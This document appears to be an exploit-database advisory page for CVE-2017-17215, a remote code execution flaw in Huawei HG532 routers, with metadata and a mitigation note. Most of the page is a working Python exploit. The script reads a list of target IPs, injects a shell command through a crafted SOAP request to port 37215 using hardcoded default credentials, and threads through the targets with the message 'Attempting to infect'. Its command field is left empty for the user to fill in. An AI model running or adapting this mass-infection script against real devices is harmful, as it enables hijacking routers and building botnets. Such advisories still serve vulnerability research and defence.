Huawei HG532 Router Remote Code Execution Vulnerability

vendor:

HG532

by:

Ricardo J. Barberis

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: HG532

Affected Version From: V200R001C00B030SP05

Affected Version To: V200R001C01B030SP05

Patch Exists: YES

Related CWE: CVE-2017-17215

CPE: h:huawei:hg532

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2018

Huawei HG532 Router Remote Code Execution Vulnerability

A remote code execution vulnerability exists in Huawei HG532 routers. An unauthenticated attacker can send a specially crafted SOAP request to the router's DeviceUpgrade_1 service on port 37215 to execute arbitrary commands with root privileges. This vulnerability affects Huawei HG532 routers with firmware versions prior to V200R001C01B031SP05.

Mitigation:

Upgrade to Huawei HG532 firmware version V200R001C01B031SP05 or later.

Source

Exploit-DB raw data:

import threading, sys, time, random, socket, re, os, struct, array, requests
from requests.auth import HTTPDigestAuth
ips = open(sys.argv[1], "r").readlines()
cmd = "" # Your MIPS (SSHD)
rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

class exploit(threading.Thread):
		def __init__ (self, ip):
			threading.Thread.__init__(self)
			self.ip = str(ip).rstrip('\n')
		def run(self):
			try:
				url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
				requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
				print "[SOAP] Attempting to infect " + self.ip
			except Exception as e:
				pass

for ip in ips:
	try:
		n = exploit(ip)
		n.start()
		time.sleep(0.03)
	except:
		pass